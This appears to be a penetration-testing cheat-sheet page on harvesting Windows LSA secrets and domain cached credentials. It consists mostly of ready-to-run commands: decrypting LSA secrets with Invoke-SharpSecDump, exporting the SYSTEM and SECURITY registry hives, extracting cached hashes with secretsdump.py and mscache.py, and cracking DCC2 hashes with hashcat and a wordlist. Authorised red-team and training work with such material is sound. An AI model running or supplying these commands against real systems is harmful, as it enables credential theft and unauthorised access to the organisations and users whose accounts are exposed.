LSA
Local Security Authority

Decrypt LSA secrets on target:
PS > Invoke-SharpSecDump -C "-target=127.0.0.1"

Domain cached credentials are stored within LSA secrets in HKLM:\SECURITY registry hive:
Cmd > reg save hklm\system system.hive
Cmd > reg save hklm\security security.hive

Export registry hives and extract cached creds locally with secretsdump.py:
$ secretsdump.py -system system.hive -security security.hive LOCAL

Export registry hives and extract cached creds locally with mscache.py:
$ python mscache.py --system system.hive --security security.hive

$ hashcat -m 2100 -O -a 0 -w 4 --session=dcc2 -o dcc2.out dcc2.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
Last modified 11mo ago
Copy link
On this page
SharpSecDump
MSCash2/MSCache2 (DCC2)
secretsdump.py
mscache.py
Crack